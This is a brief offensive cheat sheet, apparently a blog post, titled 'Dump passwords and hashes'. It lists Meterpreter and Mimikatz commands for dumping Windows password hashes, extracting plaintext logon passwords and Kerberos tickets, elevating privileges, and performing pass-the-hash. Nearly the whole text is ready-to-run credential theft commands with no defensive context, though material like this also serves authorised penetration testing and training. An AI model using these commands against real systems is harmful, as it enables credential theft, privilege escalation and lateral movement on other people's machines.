# Dump passwords and hashes


Meterpreter (remote)

- Execute meterpreter as local administrator

meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > getsystem
meterpreter > run post/windows/gather/hashdump

meterpreter > load mimikatz

meterpreter > msv
meterpreter > kerberos

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a 'full'
meterpreter > mimikatz_command -f samdump::hashes


Mimikatz (local)

- Download https://github.com/gentilkiwi/mimikatz/releases
- Execute mimikatz as local administrator

mimikatz # privilege::debug

mimikatz # sekurlsa::msv
mimikatz # sekurlsa::kerberos

mimikatz # sekurlsa::logonpasswords
mimikatz # token::whoami
mimikatz # token::elevate
mimikatz # lsadump::sam

mimikatz # sekurlsa::tickets /export
mimikatz # sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm> /run:cmd

No comments: